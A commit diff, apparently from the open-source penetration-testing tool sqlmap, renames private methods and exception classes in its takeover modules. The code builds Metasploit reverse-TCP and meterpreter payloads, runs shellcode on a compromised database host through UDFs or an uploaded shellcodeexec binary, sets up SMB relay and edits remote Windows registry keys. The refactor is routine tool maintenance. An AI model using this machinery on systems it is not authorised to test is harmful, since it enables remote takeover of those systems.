self.__icmpslaveRemote = ntToPosixSlashes(normalizePath(self.__icmpslaveRemote)) self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote))
logger.info("uploading icmpsh slave to '%s'" % self.__icmpslaveRemote) logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote)
if web: if web:
self.webFileUpload(self.__icmpslave, self.__icmpslaveRemote, self.webDirectory) self.webFileUpload(self.__icmpslave, self._icmpslaveRemote, self.webDirectory)
else: else:
self.writeFile(self.__icmpslave, self.__icmpslaveRemote, "binary") self.writeFile(self.__icmpslave, self._icmpslaveRemote, "binary")
def icmpPwn(self): def icmpPwn(self):
self.__prepareIngredients() self._prepareIngredients()
self.__runIcmpshSlaveRemote() self._runIcmpshSlaveRemote()
self.__runIcmpshMaster() self._runIcmpshMaster()
debugMsg = "icmpsh master exited" debugMsg = "icmpsh master exited"
logger.debug(debugMsg) logger.debug(debugMsg)
time.sleep(1) time.sleep(1)
self.execCmd("taskkill /F /IM %s" % self.__icmpslaveRemoteBase, silent=True) self.execCmd("taskkill /F /IM %s" % self._icmpslaveRemoteBase, silent=True)
time.sleep(1) time.sleep(1)
self.delRemoteFile(self.__icmpslaveRemote) self.delRemoteFile(self._icmpslaveRemote)

226
lib/takeover/metasploit.py
View File

@ -30,8 +30,8 @@ from lib.core.data import logger
from lib.core.data import paths from lib.core.data import paths
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import OS from lib.core.enums import OS
from lib.core.exception import sqlmapDataException from lib.core.exception import SqlmapDataException
from lib.core.exception import sqlmapFilePathException from lib.core.exception import SqlmapFilePathException
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
from lib.core.subprocessng import blockingReadFromFD from lib.core.subprocessng import blockingReadFromFD
@ -45,7 +45,7 @@ class Metasploit:
This class defines methods to call Metasploit for plugins. This class defines methods to call Metasploit for plugins.
""" """
def __initVars(self): def _initVars(self):
self.connectionStr = None self.connectionStr = None
self.lhostStr = None self.lhostStr = None
self.rhostStr = None self.rhostStr = None
@ -55,17 +55,17 @@ class Metasploit:
self.payloadConnStr = None self.payloadConnStr = None
self.localIP = getLocalIP() self.localIP = getLocalIP()
self.remoteIP = getRemoteIP() self.remoteIP = getRemoteIP()
self.__msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli")) self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
self.__msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode")) self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
self.__msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload")) self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
if IS_WIN: if IS_WIN:
_ = normalizePath(os.path.join(conf.msfPath, "..", "scripts", "setenv.bat")) _ = normalizePath(os.path.join(conf.msfPath, "..", "scripts", "setenv.bat"))
self.__msfCli = "%s & ruby %s" % (_, self.__msfCli) self._msfCli = "%s & ruby %s" % (_, self._msfCli)
self.__msfEncode = "ruby %s" % self.__msfEncode self._msfEncode = "ruby %s" % self._msfEncode
self.__msfPayload = "%s & ruby %s" % (_, self.__msfPayload) self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
self.__msfPayloadsList = { self._msfPayloadsList = {
"windows": { "windows": {
1: ( "Meterpreter (default)", "windows/meterpreter" ), 1: ( "Meterpreter (default)", "windows/meterpreter" ),
2: ( "Shell", "windows/shell" ), 2: ( "Shell", "windows/shell" ),
@ -77,7 +77,7 @@ class Metasploit:
} }
} }
self.__msfConnectionsList = { self._msfConnectionsList = {
"windows": { "windows": {
1: ( "Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp" ), 1: ( "Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp" ),
2: ( "Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports" ), 2: ( "Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports" ),
@ -91,7 +91,7 @@ class Metasploit:
} }
} }
self.__msfEncodersList = { self._msfEncodersList = {
"windows": { "windows": {
1: ( "No Encoder", "generic/none" ), 1: ( "No Encoder", "generic/none" ),
2: ( "Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed" ), 2: ( "Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed" ),
@ -109,19 +109,19 @@ class Metasploit:
} }
} }
self.__msfSMBPortsList = { self._msfSMBPortsList = {
"windows": { "windows": {
1: ( "139/TCP", "139" ), 1: ( "139/TCP", "139" ),
2: ( "445/TCP (default)", "445" ), 2: ( "445/TCP (default)", "445" ),
} }
} }
self.__portData = { self._portData = {
"bind": "remote port number", "bind": "remote port number",
"reverse": "local port number", "reverse": "local port number",
} }
def __skeletonSelection(self, msg, lst=None, maxValue=1, default=1): def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS):
opSys = "windows" opSys = "windows"
else: else:
@ -153,11 +153,11 @@ class Metasploit:
elif not choice.isdigit(): elif not choice.isdigit():
logger.warn("invalid value, only digits are allowed") logger.warn("invalid value, only digits are allowed")
return self.__skeletonSelection(msg, lst, maxValue, default) return self._skeletonSelection(msg, lst, maxValue, default)
elif int(choice) > maxValue or int(choice) < 1: elif int(choice) > maxValue or int(choice) < 1:
logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue) logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue)
return self.__skeletonSelection(msg, lst, maxValue, default) return self._skeletonSelection(msg, lst, maxValue, default)
choice = int(choice) choice = int(choice)
@ -166,10 +166,10 @@ class Metasploit:
return choice return choice
def __selectSMBPort(self): def _selectSMBPort(self):
return self.__skeletonSelection("SMB port", self.__msfSMBPortsList) return self._skeletonSelection("SMB port", self._msfSMBPortsList)
def __selectEncoder(self, encode=True): def _selectEncoder(self, encode=True):
# This is always the case except for --os-bof where the user can # This is always the case except for --os-bof where the user can
# choose which encoder to use. When called from --os-pwn the encoder # choose which encoder to use. When called from --os-pwn the encoder
# is always x86/alpha_mixed - used for sys_bineval() and # is always x86/alpha_mixed - used for sys_bineval() and
@ -178,9 +178,9 @@ class Metasploit:
return encode return encode
elif encode: elif encode:
return self.__skeletonSelection("payload encoding", self.__msfEncodersList) return self._skeletonSelection("payload encoding", self._msfEncodersList)
def __selectPayload(self): def _selectPayload(self):
if Backend.isOs(OS.WINDOWS) and conf.privEsc: if Backend.isOs(OS.WINDOWS) and conf.privEsc:
infoMsg = "forcing Metasploit payload to Meterpreter because " infoMsg = "forcing Metasploit payload to Meterpreter because "
infoMsg += "it is the only payload that can be used to " infoMsg += "it is the only payload that can be used to "
@ -188,11 +188,11 @@ class Metasploit:
infoMsg += "'getsystem' command or post modules" infoMsg += "'getsystem' command or post modules"
logger.info(infoMsg) logger.info(infoMsg)
__payloadStr = "windows/meterpreter" _payloadStr = "windows/meterpreter"
else: else:
__payloadStr = self.__skeletonSelection("payload", self.__msfPayloadsList) _payloadStr = self._skeletonSelection("payload", self._msfPayloadsList)
if __payloadStr == "windows/vncinject": if _payloadStr == "windows/vncinject":
choose = False choose = False
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
@ -228,12 +228,12 @@ class Metasploit:
choice = readInput(message, default="2") choice = readInput(message, default="2")
if not choice or choice == "2": if not choice or choice == "2":
__payloadStr = "windows/meterpreter" _payloadStr = "windows/meterpreter"
break break
elif choice == "3": elif choice == "3":
__payloadStr = "windows/shell" _payloadStr = "windows/shell"
break break
@ -252,7 +252,7 @@ class Metasploit:
elif int(choice) < 1 or int(choice) > 2: elif int(choice) < 1 or int(choice) > 2:
logger.warn("invalid value, it must be 1 or 2") logger.warn("invalid value, it must be 1 or 2")
if self.connectionStr.startswith("reverse_http") and __payloadStr != "windows/meterpreter": if self.connectionStr.startswith("reverse_http") and _payloadStr != "windows/meterpreter":
warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "") warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "")
warnMsg += "with the Meterpreter payload. Falling back to " warnMsg += "with the Meterpreter payload. Falling back to "
warnMsg += "reverse TCP" warnMsg += "reverse TCP"
@ -260,14 +260,14 @@ class Metasploit:
self.connectionStr = "reverse_tcp" self.connectionStr = "reverse_tcp"
return __payloadStr return _payloadStr
def __selectPort(self): def _selectPort(self):
for connType, connStr in self.__portData.items(): for connType, connStr in self._portData.items():
if self.connectionStr.startswith(connType): if self.connectionStr.startswith(connType):
return self.__skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535)) return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535))
def __selectRhost(self): def _selectRhost(self):
if self.connectionStr.startswith("bind"): if self.connectionStr.startswith("bind"):
message = "what is the back-end DBMS address? [%s] " % self.remoteIP message = "what is the back-end DBMS address? [%s] " % self.remoteIP
address = readInput(message, default=self.remoteIP) address = readInput(message, default=self.remoteIP)
@ -281,9 +281,9 @@ class Metasploit:
return None return None
else: else:
raise sqlmapDataException, "unexpected connection type" raise SqlmapDataException, "unexpected connection type"
def __selectLhost(self): def _selectLhost(self):
if self.connectionStr.startswith("reverse"): if self.connectionStr.startswith("reverse"):
message = "what is the local address? [%s] " % self.localIP message = "what is the local address? [%s] " % self.localIP
address = readInput(message, default=self.localIP) address = readInput(message, default=self.localIP)
@ -297,104 +297,104 @@ class Metasploit:
return None return None
else: else:
raise sqlmapDataException, "unexpected connection type" raise SqlmapDataException, "unexpected connection type"
def __selectConnection(self): def _selectConnection(self):
return self.__skeletonSelection("connection type", self.__msfConnectionsList) return self._skeletonSelection("connection type", self._msfConnectionsList)
def __prepareIngredients(self, encode=True): def _prepareIngredients(self, encode=True):
self.connectionStr = self.__selectConnection() self.connectionStr = self._selectConnection()
self.lhostStr = self.__selectLhost() self.lhostStr = self._selectLhost()
self.rhostStr = self.__selectRhost() self.rhostStr = self._selectRhost()
self.portStr = self.__selectPort() self.portStr = self._selectPort()
self.payloadStr = self.__selectPayload() self.payloadStr = self._selectPayload()
self.encoderStr = self.__selectEncoder(encode) self.encoderStr = self._selectEncoder(encode)
self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr) self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
def __forgeMsfCliCmd(self, exitfunc="process"): def _forgeMsfCliCmd(self, exitfunc="process"):
self.__cliCmd = "%s multi/handler PAYLOAD=%s" % (self.__msfCli, self.payloadConnStr) self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
self.__cliCmd += " EXITFUNC=%s" % exitfunc self._cliCmd += " EXITFUNC=%s" % exitfunc
self.__cliCmd += " LPORT=%s" % self.portStr self._cliCmd += " LPORT=%s" % self.portStr
if self.connectionStr.startswith("bind"): if self.connectionStr.startswith("bind"):
self.__cliCmd += " RHOST=%s" % self.rhostStr self._cliCmd += " RHOST=%s" % self.rhostStr
elif self.connectionStr.startswith("reverse"): elif self.connectionStr.startswith("reverse"):
self.__cliCmd += " LHOST=%s" % self.lhostStr self._cliCmd += " LHOST=%s" % self.lhostStr
else: else:
raise sqlmapDataException, "unexpected connection type" raise SqlmapDataException, "unexpected connection type"
if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
self.__cliCmd += " DisableCourtesyShell=true" self._cliCmd += " DisableCourtesyShell=true"
self.__cliCmd += " E" self._cliCmd += " E"
def __forgeMsfCliCmdForSmbrelay(self): def _forgeMsfCliCmdForSmbrelay(self):
self.__prepareIngredients(encode=False) self._prepareIngredients(encode=False)
self.__cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self.__msfCli, self.payloadConnStr) self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
self.__cliCmd += " EXITFUNC=thread" self._cliCmd += " EXITFUNC=thread"
self.__cliCmd += " LPORT=%s" % self.portStr self._cliCmd += " LPORT=%s" % self.portStr
self.__cliCmd += " SRVHOST=%s" % self.lhostStr self._cliCmd += " SRVHOST=%s" % self.lhostStr
self.__cliCmd += " SRVPORT=%s" % self.__selectSMBPort() self._cliCmd += " SRVPORT=%s" % self._selectSMBPort()
if self.connectionStr.startswith("bind"): if self.connectionStr.startswith("bind"):
self.__cliCmd += " RHOST=%s" % self.rhostStr self._cliCmd += " RHOST=%s" % self.rhostStr
elif self.connectionStr.startswith("reverse"): elif self.connectionStr.startswith("reverse"):
self.__cliCmd += " LHOST=%s" % self.lhostStr self._cliCmd += " LHOST=%s" % self.lhostStr
else: else:
raise sqlmapDataException, "unexpected connection type" raise SqlmapDataException, "unexpected connection type"
self.__cliCmd += " E" self._cliCmd += " E"
def __forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
self.__payloadCmd = "%s %s" % (self.__msfPayload, self.payloadConnStr) self._payloadCmd = "%s %s" % (self._msfPayload, self.payloadConnStr)
self.__payloadCmd += " EXITFUNC=%s" % exitfunc self._payloadCmd += " EXITFUNC=%s" % exitfunc
self.__payloadCmd += " LPORT=%s" % self.portStr self._payloadCmd += " LPORT=%s" % self.portStr
if self.connectionStr.startswith("reverse"): if self.connectionStr.startswith("reverse"):
self.__payloadCmd += " LHOST=%s" % self.lhostStr self._payloadCmd += " LHOST=%s" % self.lhostStr
elif not self.connectionStr.startswith("bind"): elif not self.connectionStr.startswith("bind"):
raise sqlmapDataException, "unexpected connection type" raise SqlmapDataException, "unexpected connection type"
if Backend.isOs(OS.LINUX) and conf.privEsc: if Backend.isOs(OS.LINUX) and conf.privEsc:
self.__payloadCmd += " PrependChrootBreak=true PrependSetuid=true" self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"
if extra == "BufferRegister=EAX": if extra == "BufferRegister=EAX":
self.__payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self.__msfEncode, self.encoderStr, outFile, format) self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
if extra is not None: if extra is not None:
self.__payloadCmd += " %s" % extra self._payloadCmd += " %s" % extra
else: else:
self.__payloadCmd += " X > \"%s\"" % outFile self._payloadCmd += " X > \"%s\"" % outFile
def __runMsfCliSmbrelay(self): def _runMsfCliSmbrelay(self):
self.__forgeMsfCliCmdForSmbrelay() self._forgeMsfCliCmdForSmbrelay()
infoMsg = "running Metasploit Framework command line " infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.." infoMsg += "interface locally, please wait.."
logger.info(infoMsg) logger.info(infoMsg)
logger.debug("executing local command: %s" % self.__cliCmd) logger.debug("executing local command: %s" % self._cliCmd)
self.__msfCliProc = execute(self.__cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def __runMsfCli(self, exitfunc): def _runMsfCli(self, exitfunc):
self.__forgeMsfCliCmd(exitfunc) self._forgeMsfCliCmd(exitfunc)
infoMsg = "running Metasploit Framework command line " infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.." infoMsg += "interface locally, please wait.."
logger.info(infoMsg) logger.info(infoMsg)
logger.debug("executing local command: %s" % self.__cliCmd) logger.debug("executing local command: %s" % self._cliCmd)
self.__msfCliProc = execute(self.__cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def __runMsfShellcodeRemote(self): def _runMsfShellcodeRemote(self):
infoMsg = "running Metasploit Framework shellcode " infoMsg = "running Metasploit Framework shellcode "
infoMsg += "remotely via UDF 'sys_bineval', please wait.." infoMsg += "remotely via UDF 'sys_bineval', please wait.."
logger.info(infoMsg) logger.info(infoMsg)
self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval") self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
def __runMsfShellcodeRemoteViaSexec(self): def _runMsfShellcodeRemoteViaSexec(self):
infoMsg = "running Metasploit Framework shellcode remotely " infoMsg = "running Metasploit Framework shellcode remotely "
infoMsg += "via shellcodeexec, please wait.." infoMsg += "via shellcodeexec, please wait.."
logger.info(infoMsg) logger.info(infoMsg)
@ -407,7 +407,7 @@ class Metasploit:
self.execCmd(cmd, silent=True) self.execCmd(cmd, silent=True)
def __loadMetExtensions(self, proc, metSess): def _loadMetExtensions(self, proc, metSess):
if not Backend.isOs(OS.WINDOWS): if not Backend.isOs(OS.WINDOWS):
return return
@ -439,7 +439,7 @@ class Metasploit:
proc.stdin.write("list_tokens -u\n") proc.stdin.write("list_tokens -u\n")
proc.stdin.write("getuid\n") proc.stdin.write("getuid\n")
def __controlMsfCmd(self, proc, func): def _controlMsfCmd(self, proc, func):
stdin_fd = sys.stdin.fileno() stdin_fd = sys.stdin.fileno()
setNonBlocking(stdin_fd) setNonBlocking(stdin_fd)
@ -489,7 +489,7 @@ class Metasploit:
metSess = re.search("Meterpreter session ([\d]+) opened", out) metSess = re.search("Meterpreter session ([\d]+) opened", out)
if metSess: if metSess:
self.__loadMetExtensions(proc, metSess.group(1)) self._loadMetExtensions(proc, metSess.group(1))
except EOFError: except EOFError:
returncode = proc.wait() returncode = proc.wait()
@ -500,15 +500,15 @@ class Metasploit:
infoMsg = "creating Metasploit Framework multi-stage shellcode " infoMsg = "creating Metasploit Framework multi-stage shellcode "
logger.info(infoMsg) logger.info(infoMsg)
self.__randStr = randomStr(lowercase=True) self._randStr = randomStr(lowercase=True)
self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr) self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr)
self.__initVars() self._initVars()
self.__prepareIngredients(encode=encode) self._prepareIngredients(encode=encode)
self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra) self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra)
logger.debug("executing local command: %s" % self.__payloadCmd) logger.debug("executing local command: %s" % self._payloadCmd)
process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE) process = execute(self._payloadCmd, shell=True, stdout=None, stderr=PIPE)
dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X")) dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
pollProcess(process) pollProcess(process)
@ -529,13 +529,13 @@ class Metasploit:
logger.debug(debugMsg) logger.debug(debugMsg)
else: else:
errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "") errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "")
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
self.__shellcodeFP = codecs.open(self.__shellcodeFilePath, "rb") self._shellcodeFP = codecs.open(self._shellcodeFilePath, "rb")
self.shellcodeString = self.__shellcodeFP.read() self.shellcodeString = self._shellcodeFP.read()
self.__shellcodeFP.close() self._shellcodeFP.close()
os.unlink(self.__shellcodeFilePath) os.unlink(self._shellcodeFilePath)
def uploadShellcodeexec(self, web=False): def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = paths.SQLMAP_SEXEC_PATH self.shellcodeexecLocal = paths.SQLMAP_SEXEC_PATH
@ -546,7 +546,7 @@ class Metasploit:
self.shellcodeexecLocal += "/linux/shellcodeexec.x%s" % Backend.getArch() self.shellcodeexecLocal += "/linux/shellcodeexec.x%s" % Backend.getArch()
# TODO: until web.py's __webFileStreamUpload() method does not consider the destFileName # TODO: until web.py's __webFileStreamUpload() method does not consider the destFileName
#__basename = "tmpse%s%s" % (self.__randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "") #__basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
__basename = os.path.basename(self.shellcodeexecLocal) __basename = os.path.basename(self.shellcodeexecLocal)
if web: if web:
@ -566,18 +566,18 @@ class Metasploit:
def pwn(self, goUdf=False): def pwn(self, goUdf=False):
if goUdf: if goUdf:
exitfunc = "thread" exitfunc = "thread"
func = self.__runMsfShellcodeRemote func = self._runMsfShellcodeRemote
else: else:
exitfunc = "process" exitfunc = "process"
func = self.__runMsfShellcodeRemoteViaSexec func = self._runMsfShellcodeRemoteViaSexec
self.__runMsfCli(exitfunc=exitfunc) self._runMsfCli(exitfunc=exitfunc)
if self.connectionStr.startswith("bind"): if self.connectionStr.startswith("bind"):
func() func()
debugMsg = "Metasploit Framework command line interface exited " debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func) debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func)
logger.debug(debugMsg) logger.debug(debugMsg)
if not goUdf: if not goUdf:
@ -585,26 +585,26 @@ class Metasploit:
self.delRemoteFile(self.shellcodeexecRemote) self.delRemoteFile(self.shellcodeexecRemote)
def smb(self): def smb(self):
self.__initVars() self._initVars()
self.__randFile = "tmpu%s.txt" % randomStr(lowercase=True) self._randFile = "tmpu%s.txt" % randomStr(lowercase=True)
self.__runMsfCliSmbrelay() self._runMsfCliSmbrelay()
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ): if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self.__randFile) self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self._randFile)
else: else:
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile) self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self._randFile)
debugMsg = "Metasploit Framework console exited with return " debugMsg = "Metasploit Framework console exited with return "
debugMsg += "code %s" % self.__controlMsfCmd(self.__msfCliProc, self.uncPathRequest) debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest)
logger.debug(debugMsg) logger.debug(debugMsg)
def bof(self): def bof(self):
self.__runMsfCli(exitfunc="seh") self._runMsfCli(exitfunc="seh")
if self.connectionStr.startswith("bind"): if self.connectionStr.startswith("bind"):
self.spHeapOverflow() self.spHeapOverflow()
debugMsg = "Metasploit Framework command line interface exited " debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, self.spHeapOverflow) debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow)
logger.debug(debugMsg) logger.debug(debugMsg)

86
lib/takeover/registry.py
View File

@ -16,68 +16,68 @@ class Registry:
This class defines methods to read and write Windows registry keys This class defines methods to read and write Windows registry keys
""" """
def __initVars(self, regKey, regValue, regType=None, regData=None, parse=False): def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False):
self.__regKey = regKey self._regKey = regKey
self.__regValue = regValue self._regValue = regValue
self.__regType = regType self._regType = regType
self.__regData = regData self._regData = regData
self.__randStr = randomStr(lowercase=True) self._randStr = randomStr(lowercase=True)
self.__batPathRemote = "%s/tmpr%s.bat" % (conf.tmpPath, self.__randStr) self._batPathRemote = "%s/tmpr%s.bat" % (conf.tmpPath, self._randStr)
self.__batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self.__randStr) self._batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self._randStr)
if parse: if parse:
readParse = "FOR /F \"tokens=*\" %%A IN ('REG QUERY \"" + self.__regKey + "\" /v \"" + self.__regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n" readParse = "FOR /F \"tokens=*\" %%A IN ('REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n"
else: else:
readParse = "REG QUERY \"" + self.__regKey + "\" /v \"" + self.__regValue + "\"" readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\""
self.__batRead = ( self._batRead = (
"@ECHO OFF\r\n", "@ECHO OFF\r\n",
readParse readParse
) )
self.__batAdd = ( self._batAdd = (
"@ECHO OFF\r\n", "@ECHO OFF\r\n",
"REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self.__regKey, self.__regValue, self.__regType, self.__regData) "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData)
) )
self.__batDel = ( self._batDel = (
"@ECHO OFF\r\n", "@ECHO OFF\r\n",
"REG DELETE \"%s\" /v \"%s\" /f" % (self.__regKey, self.__regValue) "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue)
) )
def __createLocalBatchFile(self): def _createLocalBatchFile(self):
self.__batPathFp = open(self.__batPathLocal, "w") self._batPathFp = open(self._batPathLocal, "w")
if self.__operation == "read": if self.__operation == "read":
lines = self.__batRead lines = self._batRead
elif self.__operation == "add": elif self.__operation == "add":
lines = self.__batAdd lines = self._batAdd
elif self.__operation == "delete": elif self.__operation == "delete":
lines = self.__batDel lines = self._batDel
for line in lines: for line in lines:
self.__batPathFp.write(line) self._batPathFp.write(line)
self.__batPathFp.close() self._batPathFp.close()
def __createRemoteBatchFile(self): def _createRemoteBatchFile(self):
logger.debug("creating batch file '%s'" % self.__batPathRemote) logger.debug("creating batch file '%s'" % self._batPathRemote)
self.__createLocalBatchFile() self._createLocalBatchFile()
self.writeFile(self.__batPathLocal, self.__batPathRemote, "text") self.writeFile(self._batPathLocal, self._batPathRemote, "text")
os.unlink(self.__batPathLocal) os.unlink(self._batPathLocal)
def readRegKey(self, regKey, regValue, parse=False): def readRegKey(self, regKey, regValue, parse=False):
self.__operation = "read" self.__operation = "read"
self.__initVars(regKey, regValue, parse=parse) self._initVars(regKey, regValue, parse=parse)
self.__createRemoteBatchFile() self._createRemoteBatchFile()
logger.debug("reading registry key '%s' value '%s'" % (regKey, regValue)) logger.debug("reading registry key '%s' value '%s'" % (regKey, regValue))
data = self.evalCmd(self.__batPathRemote) data = self.evalCmd(self._batPathRemote)
if data and not parse: if data and not parse:
pattern = ' ' pattern = ' '
@ -85,32 +85,32 @@ class Registry:
if index != -1: if index != -1:
data = data[index + len(pattern):] data = data[index + len(pattern):]
self.delRemoteFile(self.__batPathRemote) self.delRemoteFile(self._batPathRemote)
return data return data
def addRegKey(self, regKey, regValue, regType, regData): def addRegKey(self, regKey, regValue, regType, regData):
self.__operation = "add" self.__operation = "add"
self.__initVars(regKey, regValue, regType, regData) self._initVars(regKey, regValue, regType, regData)
self.__createRemoteBatchFile() self._createRemoteBatchFile()
debugMsg = "adding registry key value '%s' " % self.__regValue debugMsg = "adding registry key value '%s' " % self._regValue
debugMsg += "to registry key '%s'" % self.__regKey debugMsg += "to registry key '%s'" % self._regKey
logger.debug(debugMsg) logger.debug(debugMsg)
self.execCmd(cmd=self.__batPathRemote) self.execCmd(cmd=self._batPathRemote)
self.delRemoteFile(self.__batPathRemote) self.delRemoteFile(self._batPathRemote)
def delRegKey(self, regKey, regValue): def delRegKey(self, regKey, regValue):
self.__operation = "delete" self.__operation = "delete"
self.__initVars(regKey, regValue) self._initVars(regKey, regValue)
self.__createRemoteBatchFile() self._createRemoteBatchFile()
debugMsg = "deleting registry key value '%s' " % self.__regValue debugMsg = "deleting registry key value '%s' " % self._regValue
debugMsg += "from registry key '%s'" % self.__regKey debugMsg += "from registry key '%s'" % self._regKey
logger.debug(debugMsg) logger.debug(debugMsg)
self.execCmd(cmd=self.__batPathRemote) self.execCmd(cmd=self._batPathRemote)
self.delRemoteFile(self.__batPathRemote) self.delRemoteFile(self._batPathRemote)

34
lib/takeover/udf.py
View File

@ -21,10 +21,10 @@ from lib.core.enums import EXPECTED
from lib.core.enums import OS from lib.core.enums import OS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.common import unArrayizeValue from lib.core.common import unArrayizeValue
from lib.core.exception import sqlmapFilePathException from lib.core.exception import SqlmapFilePathException
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.request import inject from lib.request import inject
@ -39,7 +39,7 @@ class UDF:
self.udfs = {} self.udfs = {}
self.udfToCreate = set() self.udfToCreate = set()
def __askOverwriteUdf(self, udf): def _askOverwriteUdf(self, udf):
message = "UDF '%s' already exists, do you " % udf message = "UDF '%s' already exists, do you " % udf
message += "want to overwrite it? [y/N] " message += "want to overwrite it? [y/N] "
output = readInput(message, default="N") output = readInput(message, default="N")
@ -49,18 +49,18 @@ class UDF:
else: else:
return False return False
def __checkExistUdf(self, udf): def _checkExistUdf(self, udf):
logger.info("checking if UDF '%s' already exist" % udf) logger.info("checking if UDF '%s' already exist" % udf)
query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf)) query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
return inject.getValue(query, resumeValue=False, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY) return inject.getValue(query, resumeValue=False, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY)
